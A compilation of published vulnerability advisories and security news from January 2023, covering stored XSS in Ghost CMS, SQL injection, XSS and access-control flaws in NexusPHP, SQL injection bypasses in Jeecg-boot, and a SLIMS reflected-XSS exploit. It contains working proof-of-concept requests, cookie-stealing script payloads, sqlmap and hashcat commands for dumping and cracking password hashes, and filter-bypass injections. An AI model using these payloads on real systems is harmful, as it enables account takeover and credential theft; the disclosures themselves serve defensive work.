Dave McDaniel of Cisco Talos discovered this vulnerability.
Cisco Talos recently discovered a cross-site scripting (XSS) vulnerability in Ghost CMS.
Ghost is a content management system with tools to build a website, publish content and send newsletters. Ghost offers paid subscriptions to members and supports a number of integrations with

Thursday, January 19, 2023 15:01

_Dave McDaniel of Cisco Talos discovered this vulnerability._

Cisco Talos recently discovered a cross-site scripting (XSS) vulnerability in Ghost CMS.

Ghost is a content management system with tools to build a website, publish content and send newsletters. Ghost offers paid subscriptions to members and supports a number of integrations with external services.

The TALOS-2022-1686 (CVE-2022-47194-CVE-2022-47197) shows that several XSS vulnerabilities could lead to privilege escalation.

Ghost CMS separates users into four groups (five, if including the site owner) of increasing privilege: Contributor, Author, Editor and Administrator. Contributor users have the least privilege and are allowed to create but not publish posts. All users have the ability to include social media links, as well as a few other pieces of information that will be included on their posts and author pages. A stored XSS vulnerability exists in a number of these fields, and it can be leveraged from basic user attacks to full privilege escalation. As with any XSS, it does require a target user with the correct access level to access affected resources while logged in to trigger the injected Javascript. The vulnerabilities listed here can be triggered when a higher-level user simply previews or visits any post by the malicious user, as these social links seem to be included in all of a user's posts. We have confirmed that a full privilege escalation to administrator can be achieved with the correct Javascript payload.

Separating the admin domain as documented at https://ghost.org/docs/config/#admin-url will prevent this type of vulnerability from being exploited to perform privileged API calls, such as modifying a user group, adding users, etc. However, in default installations, these vulnerabilities can be used for privilege escalation via XSS. Essentially this means that, in default installations of Ghost CMS, users that can author pages and administrator users have the same privileges.

Ghost responded to notification of this advisory with: “Ghost is designed to be used by trusted users, and we are not interested in hypothetical attack vectors involving staff users attacking each other. This is not how the product is used. For any people who are using Ghost in an untrusted environment, we have clearly documented steps to add further separation of concerns between staff users... We do not consider this to be a valid report."

Cisco Talos believes these are potential security issues due to the fact that it is trivial to escalate privileges in default installations. Talos notified Ghost in adherence to Cisco’s vulnerability disclosure policy.

Talos tested and confirmed this version of Ghost could be exploited by this vulnerability: Ghost Foundation Ghost 5.9.4.

The following Snort rules will detect exploitation attempts against this vulnerability: 60764-60765. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Vulnerability Spotlight: XSS vulnerability in Ghost CMS

Weak access control in NexusPHP before 1.7.33 allows a remote authenticated user to edit any post in the forum (this is caused by a lack of checks performed by the /forums.php?action=post page).

SureCloud undertook an independent security review of NexusPHP and identified multiple vulnerabilities from both authenticated and unauthenticated sources that could be exploited remotely. 

Identifying vulnerabilities is part of how SureCloud provides its clients with superior risk management and security services and tools — explore the possibilities of SureCloud’s Vulnerability Management software.

In our NexusPHP security review, we assigned the following CVEs:

*   **_CVE2022-46887 –_** Unauthenticated SQL Injection
*   _**CVE2022-46889 –**_ Authenticated Stored Cross-Site Scripting
*   _**CVE2022-46888 –**_ Unauthenticated Reflected Cross-Site Scripting
*   _**CVE2022-46890 –**_ Weak Access Control

These CVEs impact all versions of NexusPHP before and including 1.7.32. The latest version, 1.7.33, includes security fixes for all of the above vulnerabilities.

Below is a detailed overview of the NexusPHP platform, the vulnerabilities SureCloud identified, and suggestions on how to fix them. 

****What is NexusPHP?****

NexusPHP (_github.com/xiaomlove/nexusphp_ _–_ _nexusphp.org_) is an open-source private torrent (PT) content management system (CMS).

Compared to a public torrent tracker, a private one only allows users that are logged in to browse, download and upload torrents from its URL. This project was forked from an outdated and unmaintained version of NexusPHP (_github.com/zjutjh/NexusPHP_) and enriched with Laravel and Filament. 

****What is an SQL Injection?****

Structured Query Language (SQL) Injection is a vulnerability that occurs when an attacker directly embeds code into an SQL query. This results in a change to the meaning of the original query and the unexpected modification or extraction of potentially sensitive data.

It is one of the most harmful types of attack, as it can be used against any website or web application that uses an SQL-based database. In some extreme situations, it would also be possible to compromise the underlying Database Management System (DBMS) and gain access to an organization’s entire infrastructure.

There are two main ways to exploit SQL injections:

*   _**Results in output –**_ Occurs when the output from the manipulated query is reflected in the application’s response via an error message or in the page content, making it very easy to identify this type of vulnerability

*   _**Blind –**_ Occurs when no output data or error message is returned in the application’s responses. The extraction of sensitive data can still happen via the use of time-based functions embedded in the DBMS

****CVE2022-46887 – Unauthenticated SQL Injection****

Unauthenticated remote attackers can exploit an instance of SQL injection (time-based function) affecting the ‘conuser\[\]’ parameter in ‘takeconfirm.php’. 

A proof of concept request will make the DBMS go into a state of sleep for two seconds before serving the following response: 

_**POST /takeconfirm.php HTTP/1.1  
Host: 127.0.0.1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 50  
id=1&email=fail\_sendmail&conusr\[\]=1-sleep(2));+–+**_

This behavior is caused by the way the ‘consur’ parameter is handled in line nine of the file, /public/takeconfirm.php:

_**if(isset($\_POST\[‘conusr’\]))  
sql\_query(“UPDATE users SET status = ‘confirmed’, editsecret = ” WHERE id IN (” . implode(“, “, $\_POST\[‘conusr’\]) . “) AND status=’pending’”);**_

As this is a time-based SQL injection, it can be exploited by automated tools such as ‘sqlmap’. For example:

_**sqlmap -r post\_request.txt -D nexusphp -T users -C secret,passhash –dump**_

> 

With secret (salt) and passhash obtained, the original plaintext password can be retrieved using hashcat with the following parameter:

_**File format: <passhash>:<secret>  
Run: hashcat.exe -m 3800**_

Several other authenticated SQL injections were observed during the code review, but a CVE was not requested due to the authentication needed to fully exploit them. For example:

_**Page:** cheaterbox.php**Parameter:** delcheater**Privileges:** Staff Member**Proof of concept:**_ 

                      _**POST/cheaterbox.php                                                                                                                                                                                            \[…\]**_                                                                                                                           

                      _**setdealt=Set+Dealt&delcheater\[\]=0)+UNION+ALL+SELECT+(‘anything’**_                                                    

Caused by the following code in public/cheaterbox.php:

_**15:     $res = sql\_query (“SELECT id FROM cheaters WHERE dealtwith=0 AND id IN (” . implode(“, “, $\_POST\[‘delcheater’\]) . “)”);  
24:     $res = sql\_query (“SELECT id FROM cheaters WHERE id IN (” . implode(“, “, $\_POST\[‘delcheater’\]) . “)”);**_

_**Page:** nowarn.php**Parameter:** usernw**Privilege:** Staff Member**Proof of concept:**_ 

                    _**POST /nowarn.php HTTP/1.1**_                                                    

                    _**\[…\]**_                                                                                                                                                                                                                                     _**nowarned=nowarned&usernw\[\]=2)+UNION+SELECT+passhash+FROM+users+WHERE+ID=(1&**_

                   _**desact=1&delete=o**_                                                  

Caused by the following code in public/nowarn.php:

_**27: $r = sql\_query(“SELECT modcomment FROM users WHERE id IN (” . implode(“, “, $\_POST\[‘usernw’\]) . “)”)or sqlerr(\_\_FILE\_\_, \_\_LINE\_\_);**_

****How do you prevent SQL Injections?****

It’s possible to prevent SQL injections at the code base by filtering user input. This is done by implementing prepared statements or stored procedures that are available in all programming languages. This prevents user input interfering with the query structure and the original meaning remains unchanged. 

Other best practices should also be in place to limit the impact of potential SQL Injection vulnerabilities. For example:

*   The principle of least privilege when connecting to a DBMS

*   A Web Application Firewall (WAF), which prevents common payloads from exploiting the vulnerability

*   Software Development Lifecycle (SDLC) methodology can help identify vulnerabilities before they are pushed into a production environment through the use of code analysis tools

****What is Cross-Site Scripting (XSS)?****

Cross-site scripting attacks occur when user input is reflected into the application’s page without being properly sanitized. This allows for the possible injection of JavaScript or HTML code that can be executed once the page is rendered in a browser.

There are three types of XSS:

*   _**Stored –**_ This occurs when the user input is stored within a database and is returned unsanitized in later responses. E.g. every time a visitor opens a specific page in the vulnerable application

*   _**Reflected –**_ This happens when the user input (often in GET or POST parameter) is reflected back unsanitized, but only in the current response. Therefore, the XSS payload must be embedded in the request to be successful

*   _**DOM-based –**_ Commonly occurs when the user input changes the browser’s DOM environment in a way that JavaScript code is injected and executed. This often happens because client-side JavaScript cannot process data from untrusted input sources, such as old libraries

****CVE2022-46880 – Authenticated Stored Cross-Site Scripting** **

An authenticated attacker with permissions to upload new subtitles can exploit an instance of cross-site scripting (stored) affecting the ‘title’ parameter used in ‘subtitles.php’ page. 

A proof of concept request is as follows: 

_**POST /subtitles.php? HTTP/1.1  
Host: 192.168.204.137**_

_**Content-Type: multipart/form-data;                                                                                                                                        boundary=—————————538246582365809108635404342  
Content-Length: 706  
Cookie: <valid session token>**_

_**—————————–538246582365809108635404342**_  
_**Content-Disposition: form-data; name=”action”**_

_**Upload**_  
_**—————————–538246582365809108635404342**_  
_**Content-Disposition: form-data; name=”file”; filename=”test.srt”**_  
_**Content-Type: text/html**_

 _**Test  
—————————–538246582365809108635404342  
Content-Disposition: form-data; name=”torrent\_id”**_ 

_**1  
—————————–538246582365809108635404342  
Content-Disposition: form-data; name=”title”**_

_**111<svg/onload=alert(document.cookie);>  
—————————–538246582365809108635404342  
Content-Disposition: form-data; name=”sel\_lang”**_

_**14**_  
_**—————————–538246582365809108635404342–**_

This is caused by how the ‘details.php’ page reflects the user input (title) without proper encoding:

_**while($a = mysql\_fetch\_assoc($r))  
\[..\]  
<u>”. $a\[“title”\]. “</u>  
\[…\]**_

****CVE2022-46888 – Unauthenticated Reflected Cross-Site Scripting** **

An unauthenticated attacker can exploit an instance of cross-site scripting (reflected) affecting the ‘secret’ parameter used on the ‘login.php’ page.

The proof of concept request is as follows:

_**/login.php?secret=”><svg+onload=”alert(document.cookie)**_

The input passed in ‘secret’ is reflected twice in the response page without proper encoding, which allows JavaScript code to be executed in the browser. The issue is caused by the following line in the code of public/login.php: 

_**53: <input type=”hidden” name=”secret” value=”<?php echo $\_GET\[‘secret’\] ?? ”?>”>**_

Several other instances of cross-site scripting, authenticated or unauthenticated, were observed during the code review, but no CVEs were raised. For example: 

_**Page:** user-ban-log.php**Parameter:** q**Privilege:** unauthenticated**Proof of concept:** /user-ban-log.php?q=admin”><svg/onload=alert(document.cookie)>_

_**Page:** log.php**Parameter:** query**Privilege:** user role**Proof of concept:** /log.php?query=”><svg+onload=”alert(document.cookie)&search=all&action=dailylog_

_**Page:** moresmiles.php**Parameter:** text**Privilege:** user role**Proof of concept:** /moresmilies.php?form=&text=’)”><svg+onload=alert(document.cookie)>_

_**Page:** myhr.php**Parameter:** q**Privilege:** user role**Proof of concept:** /myhr.php?q=”><svg+onload=alert(document.cookie)>_

_**Page:** viewrequests.php**Parameter:** id**  
Privilege:** user role**Proof of concept:** /viewrequests.php?action=newmessage&id=><svg+onload=alert(document.cookie) and /viewrequests.php?action=res&id=”><svg+onload=”alert(document.cookie)_

****What’s the solution to XSS?****

The best way to defend against cross-site scripting is output encoding. All user input reflected in a later response, received from a database or from a GET/POST parameter, should be encoded to prevent it from being executed in a browser. Several types of encoding can be applied based on where the user output is returned, such as URL and HTML JavaScript or CSS encoding. 

You can implement other security measures to limit the severity of an XSS attack, such as the use of ‘Content Type’ and ‘X-Content-Type-Options’ response headers. Both will ensure browsers interpret responses in the intended way, for example, text/plain instead of text/html. 

Using an ‘HTTPOnly’ flag in-session helps prevent JavaScript from reading content or implementing a Content Security Policy (CSP) header to specify which resources can be executed on the application.

****What is Weak Access Control?****

Access Control regulates which actions can be performed in the application. For example, standard users shouldn’t be able to use or access functionalities only available to administrative users. These controls are created by a programmer, and so are not usually made or enforced by the technology or framework in use.

The main types of access controls are:

*   _**Horizontal access controls –**_ These controls prevent User A from accessing/editing/deleting functionalities belonging to User B

*   _**Vertical access controls –**_ These controls prevent User A from accessing/editing/deleting functionalities belonging to a higher user privilege: e.g., an administrative user

*   _**Context-dependent access controls –**_ These controls prevent any kind of user from subverting the logic of one or multiple application functionalities: e.g., multi-step user journey

****CVE2022-46890 – Weak Access Control****

In this case, the type of weak access control identified within the application was vertical. An authenticated user can edit any post within the forum, even those not accessible or visible to their current role. The attack is made possible because the application did not check the permissions before executing the edit action. 

The proof of concept POST request is as follows: 

_**POST /forums.php?action=post HTTP/1.1**_

_**Host: 192.168.204.137**_

_**Content-Type: application/x-www-form-urlencoded**_

_**Content-Length: 60**_

_**Cookie: <valid session cookies>**_

 _**id=7&type=edit&color=0&font=0&size=0&body=permissions+check2**_

Once the page refreshed, a standard user (user 2) was able to edit the content of a post created by an administrative user.

By enumerating the ‘id’ parameter (incremental numeric digits), it is possible to replace any post created in the forum with a custom message.

Several other misconfigurations were also observed during the code review, but CVEs weren’t requested.

For example, it was possible to access the shout box, a chat box for users of the platform,  from an unauthenticated perspective by simply browsing the URL ‘/shoutbox.php’.

Similarly, the ‘aboutnexus.php’ page was also accessible as an unauthenticated user, which contained sensitive information about the current version of NexusPHP.

Finally, an open redirect was identified and was exploitable from an authenticated perspective. Open redirect can trick the user into landing on an arbitrary page outside of the application’s scope and can be exploited as follows:

_**POST forums.php?action=setsticky  
\[…\]  
topicid=1&returnto=https://www.google.com**_

****Weak Access Control prevention****

To prevent access control vulnerabilities, it is fundamental for programmers to implement the following principles: 

*   All backend pages must check the validity of a user’s session, via a cookie or authentication token, before serving any content

*   When multiple user roles are involved, the web application must consider each role and check if the currently logged-in user is allowed to access such functionality. Do not rely on user input to check the role. A map or matrix on the server must perform this check

*   Access to resources or data belonging to different users must validate if the currently logged-in user is the resource’s owner before being served

*   Avoid using a predictable resource identifier (e.g., numeric or incremental IDs). It is widely recommended to use universally unique identifiers for UUIDs

*   Before publishing the application, implement test cases in the SDLC so that each possible case scenario is tested and triaged in pre-production

****Need some assistance?** ******To find out more about how SureCloud’s products or services can support the security posture of your application and identify vulnerabilities, contact a member of our team or visit www.surecloud.com.****

CVE-2022-46890: NexusPHP - SureCloud Security Review Identifies Authenticated and Unauthenticated Vulnerabilities

An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.A stored XSS vulnerability exists in the `codeinjection_foot` for a post.

**SUMMARY**

An insecure default vulnerability exists in the Post Creation functionality of Ghost Foundation Ghost 5.9.4. Default installations of Ghost allow non-administrator users to inject arbitrary Javascript in posts, which allow privilege escalation to administrator via XSS. To trigger this vulnerability, an attacker can send an HTTP request to inject Javascript in a post to trick an administrator into visiting the post.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Ghost Foundation Ghost 5.9.4

**PRODUCT URLS**

Ghost - http://www.ghost.org

**CVSSv3 SCORE**

9.0 - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

**CWE**

CWE-453 - Insecure Default Variable Initialization

**DETAILS**

Ghost is a content management system with tools to build a website, publish content and send newsletters. Ghost offers paid subscriptions to members and supports a number of integrations with external services.

Ghost CMS separates users into four groups (five, if including the site owner) of increasing privilege: Contributor, Author, Editor and Administrator. Contributor users have the least privilege and are allowed to create but not publish posts. All users have the ability to include social media links, as well as a few other pieces of information that will be included on their posts and author pages. A stored XSS vulnerability exists in a number of these fields, and it can be leveraged from basic user attacks to full privilege escalation. As with any XSS, it does require a target user with the correct access level to access affected resources while logged in to trigger the injected Javascript. The vulnerabilities listed here can be triggered when a higher level user simply previews or visits any post by the malicious user, as these social links seems to be included in all of a user’s posts. We have confirmed that a full privilege escalation to administrator can be achieved with the correct Javascript payload.

Separating the admin domain as documented at https://ghost.org/docs/config/#admin-url will prevent this type of vulnerability from being exploited to perform privileged API calls, such as modifying a user group, adding users, etc. However, in default installations, these vulnerabilities can be used for privilege escalation via XSS. Essentially this means that, in default installations of Ghost CMS, users that can author pages and administrator users have the same privileges.

**CVE-2022-47194 - Twitter**

A stored XSS vulnerability exists in the twitter field for a user.

    PUT /ghost/api/admin/users/632e1c14c8b0a2000e53cf2e/?include=roles HTTP/1.1
    Host: localhost:3001
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json; charset=utf-8
    X-Ghost-Version: 5.12
    App-Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 104
    Origin: http://localhost:3001
    DNT: 1
    Connection: close
    Referer: http://localhost:3001/ghost/
    Cookie: ghost-admin-api-session=...
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"users":[{"twitter":"</script><script>alert('XSS')</script>"}]}
    

**CVE-2022-47195 - Facebook**

A stored XSS vulnerability exists in the facebook field for a user:

    PUT /ghost/api/admin/users/632e1c14c8b0a2000e53cf2e/?include=roles HTTP/1.1
    Host: localhost:3001
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json; charset=utf-8
    X-Ghost-Version: 5.12
    App-Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 69
    Origin: http://localhost:3001
    DNT: 1
    Connection: close
    Referer: http://localhost:3001/ghost/
    Cookie: ghost-admin-api-session=...
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"users":[{"facebook":"</script><script>alert('XSS')</script>"}]}
    

**CVE-2022-47196 - codeinjection\_head**

A stored XSS vulnerability exists in the codeinjection\_head for a post:

    POST /ghost/api/admin/posts/ HTTP/1.1
    Host: localhost:3001
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json; charset=utf-8
    X-Ghost-Version: 5.12
    App-Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 144
    Origin: http://localhost:3001
    DNT: 1
    Connection: close
    Referer: http://localhost:3001/ghost/
    Cookie: ghost-admin-api-session=...
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"posts":[{"title":"My Test Post",
    "codeinjection_head":"<iframe onload=\"alert('XSS')\" />",
    "authors":[{"id":"632e1c14c8b0a2000e53cf2e"}]}]}
    

**CVE-2022-47197 - codeinjection\_foot**

A stored XSS vulnerability exists in the codeinjection\_foot for a post:

    POST /ghost/api/admin/posts/ HTTP/1.1
    Host: localhost:3001
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:104.0) Gecko/20100101 Firefox/104.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json; charset=utf-8
    X-Ghost-Version: 5.12
    App-Pragma: no-cache
    X-Requested-With: XMLHttpRequest
    Content-Length: 172
    Origin: http://localhost:3001
    DNT: 1
    Connection: close
    Referer: http://localhost:3001/ghost/
    Cookie: ghost-admin-api-session=...
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    {"posts":[{"title":"My Test Post",
    "codeinjection_head":null,
    "codeinjection_foot":"<iframe onload=\"alert('XSS')\" />",
    "authors":[{"id":"632e1c14c8b0a2000e53cf2e"}]}]}
    

**TIMELINE**

2022-10-26 - Initial Vendor Contact

2022-10-26 - Vendor Disclosure

2022-10-31 - Vendor doesn’t consider issue a security problem

2022-11-22 - Vendor still doesn’t consider the issue a security problem

2023-01-05 - Revised advisory sent to vendor

2023-01-12 - Vendor still doesn’t see issue as security issue

2023-01-19 - Public release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-47197: TALOS-2022-1686 || Cisco Talos Intelligence Group

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in 3com – Asesor de Cookies para normativa española plugin <= 3.4.3 versions.

**Solution**

No patched version is available. No reply from the vendor.

ptsfence discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress 3com – Asesor de Cookies para normativa española Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-40697: WordPress 3com – Asesor de Cookies plugin <= 3.4.3 - Auth. Stored Cross-Site Scripting (XSS) vulnerability - Patchstack

The report highlights concerning security stats following two years of extreme tech growth.

**OTTAWA,** **ON****,** **Jan.** **19,** **2023** **/PRNewswire/ -** The media industry is at higher risk of cyber attack. According to the newly released State of Penetration Testing as a Service report, an average of 3.75 critical vulnerabilities were found for every MediaTech application tested in 2022. During the same period, the data & analytics industry came second with an average of 1.5 critical vulnerabilities found per client application. Across all industries, 0.9 critical vulnerabilities were identified per client application.

Critical vulnerabilities are the most severe form of application security risk, and include categories of vulnerabilities such as SQL injection (SQLi), remote code execution (RCE), command injections, and unauthorized administrative host/application access. The "OWASP Top 10" also defines a list of the most common and severe vulnerabilities facing software applications today.

Companies facing critical vulnerabilities are at high risk as these issues are easily exploitable and will have significant damaging effects if exploited by a malicious hacker. Negative consequences include unauthorized release of confidential information, access to sensitive customer data, and access to control internal systems. As such, most companies are recommended to fix these within a maximum of 5 days after discovery.

Software Secured, an Ottawa\-based penetration testing firm, released the report based on insights from their client testing in 2021 and 2022. The goal of the report is to help leaders of security and compliance teams understand the most prominent risks facing their software within the next year. Included within the report are explanations on the identified threats and recommendations for companies to stay ahead of hackers. Some other insights gained from their reporting include:

*   Increase in critical-level SQL injection attacks by 250% compared to 2021
*   Increase in high-severity Denial of Service (DoS) attacks by 133% compared to 2021
*   Cross-site scripting (XSS) findings remain the most common critical vulnerability for two years in a row

Penetration testing as a service (PTaaS) is a comprehensive security assessment that is proven to help companies secure their applications, significantly decreasing the likelihood of cyber attacks

Download the full 2022 State of Penetration Testing as a Service report here.

For more information or questions, please visit us online at softwaresecured.com or contact us with the information below:

SOURCE Software Secured

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

The Media Industry Is the Most Vulnerable to Cyber Attacks, Report Shows

Six payouts issued for bugs uncovered in Theia, Vertex AI, Compute Engine, and Cloud Workstations

Six payouts issued for bugs uncovered in Theia, Vertex AI, Compute Engine, and Cloud Workstations

Vulnerabilities in four Google Cloud Platform (GCP) projects have earned a pair of security researchers more than $22,000 in bug bounties.

The most lucrative project for hacker duo Sreeram KL and Sivanesh Ashok was machine learning training and deployment platform Vertex AI, which netted them a pair of $5,000 payouts for a server-side request forgery (SSRF) bug and subsequent patch bypass.

Documented in a blog post by Sreeram, the flaw resided in Vertex AI’s workbench feature, which enables the creation of Jupyter notebook-based development environments on the cloud.

By abusing the SSRF vulnerability and duping victims into clicking a malicious URL, attackers could potentially seize control of an authorization token and thereafter all of the victim’s GCP projects, as demonstrated in the video below.

  
**SSRF bug**

When the researchers found a URL that seemed to offer scope for SSRF, “requesting the original URL resulted in a response that looked like the output of an authenticated request sent to compute.googleapis.com,” said Sreeram. “From previous experience, I know these endpoints use the authorization header for credentials.”

Fuzzing surfaced a URL – https://{INSTANCE-ID}-dot-us-central1.notebooks.googleusercontent.com/aipn/v2/proxy/{attacker.com}/compute.googleapis.com/ – that bypassed this check, said Sreeram. “Furthermore, the vulnerable endpoint was a request with no CSRF protection (pretty common),” said Sreeram.

YOU MIGHT ALSO LIKE US government announces third Hack The Pentagon challenge

As for finding attack targets, a victim’s subdomain is readily ascertained because subdomains are leaked to several third-party domains, such as github.com, “via referer in the general application flow”.

Google addressed the issue by adding cross-site request forgery (CSRF) protection to the endpoints and improving verification of the domain.

**Patch bypass**

After the fix was rolled out, however, Sreeram and Ashok noticed that changing compute.googleapis.com to something.google.com failed to trigger an error as it had previously.

Circumventing the fix therefore needed an open redirection in \*.google.com, they surmised.

With JavaScript-based redirections not an option – since the server didn’t parse the language – they turned to Google web feed management service FeedBurner. The researchers found that when the user deactivates the proxy, the service will redirect URLs to their domain rather than proxying their RSS feed.

The exploit concluded with a CSRF bypass that leveraged a technique developed in 2020 by ‘@s1r1us’ targeting Jupyter Lab.

The second fix involved ending support for \*.google.com as a proxy URL.

“While finding this issue, we gained insight into the workings of managed GCP products, which helped us find other bugs in GCP,” Sreeram told The Daily Swig.

  
**Theia, Compute Engine, Workstations bugs**

This included exploiting the workbench feature again in Theia, the integrated development environment (IDE) Google uses in Cloud Shell, as disclosed in a separate blog post published by Sreeram.

Because user-managed instances used the project’s default compute engine service account, the research duo were able to compromise the entire project by exploiting a known XSS vulnerability (CVE-2021-41038) to fetch the service account token from the metadata server. This earned the pair a further $3133.70 bounty.

Catch up with the latest bug bounty news

The first security flaw they found in GCP, as documented by Ashok, was an SSH key injection issue in Google Cloud’s Compute Engine.

Generating a $5,000 windfall with a $1,000 bounty bonus, the vulnerability resided in the SSH-in-browser function and could lead to remote code execution (RCE) in a victim’s Compute Engine instance (as demonstrated in the proof-of-concept video above).

The researchers also earned a further $3,133.70 for an authorization bypass in Cloud Workstations, which provides fully managed development environments for security-sensitive enterprises. Ashok outlined this find in a fourth blog post.

The pair earned a total of $22,267 from six separate bug bounty payouts.

The Daily Swig has invited Google to comment on these vulnerabilities but no response yet. We’ll update the article should that change.

DON’T FORGET TO READ Squaring the CircleCI: DevOps platform publishes post-mortem on recent breach

Google pays hacker duo $22k in bug bounties for flaws in multiple cloud projects

Jeecg-boot v3.4.4 was discovered to contain a SQL injection vulnerability via the component /sys/dict/queryTableData.

**版本号：3.4.4****前端版本：vue2版****问题描述：sql注入检测代码存在绕过.****截图&代码：**

SqlInjectionUtil类中sql的注释正则为

private final static Pattern SQL\_ANNOTATION = Pattern.compile("/\\\\\*.\*\\\\\*/");

.无法匹配到%0A, 导致可以利用/\*%0A\*/绕过  
关键字检测后存在空格,导致绕过

private final static String XSS\_STR = "and |extractvalue|updatexml|exec |insert |select |delete |update |drop |count |chr |mid |master |truncate |char |declare |;|or |+|user()";

AbstractQueryBlackListHandler类中的黑名单:

ruleMap.put("sys\_user", "password,salt");

在isPass函数中ruleMap.get(name)为null即可绕过, 可以采用sys_user, (sys\_user), sys\_user%20等绕过

存在多个注入点:

1.  /sys/duplicate/check接口:

dataId\=2000&fieldName\=(select(if(((select/\*%0A\*/password/\*%0A\*/from/\*%0A\*/sys\_user/\*%0A\*/where/\*%0A\*/username/\*%0A\*/\='jeecg')='eee378a1258530cb'),sleep(4),1)))&fieldVal\=1000&tableName\=sys\_log

2.  /sys/api/getDictItems  
    该接口没有进行签名校验:

?dictCode\=sys\_user%20,username,password

3.  sys/dict/queryTableData

?table\=%60sys\_user%60&pageSize\=22&pageNo\=1&text\=username&code\=password

**友情提示（为了提高issue处理效率）：**

*   未按格式要求发帖，会被直接删掉;
*   描述过于简单或模糊，导致无法处理的，会被直接删掉；
*   请自己初判问题描述是否清楚，是否方便我们调查处理；
*   针对问题请说明是Online在线功能(需说明用的主题模板)，还是生成的代码功能；

CVE-2022-47105: jeecg-boot3.4.4 存在sql注入漏洞 · Issue #4393 · jeecgboot/jeecg-boot

SLIMS version 9.5.2 suffers from a cross site scripting vulnerability.

    ## Title: SLIMS-9.5.2 - XSS Reflected - Account Exploit## Development: nu11secur1ty## Date: 01.19.2023## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.5.2## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload udz21<script>alert(1)</script>rk346 was submitted inmanual insertion point 3.This input was echoed unmodified in the application's response.The attacker can trick the already logged-in user, to visit theexploit link that this attacker is created,and if this already logged-in user is not actually IT or admin, thiswill be the end of this system.## STATUS: HIGH Vulnerability[+] Exploit:```GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27HTTP/1.1Host: pwnedhost1.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1;SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2)## Proof and Exploit:[href](https://streamable.com/zd6e18)## Reference:[href](https://portswigger.net/web-security/cross-site-scripting)

SLIMS 9.5.2 Cross Site Scripting

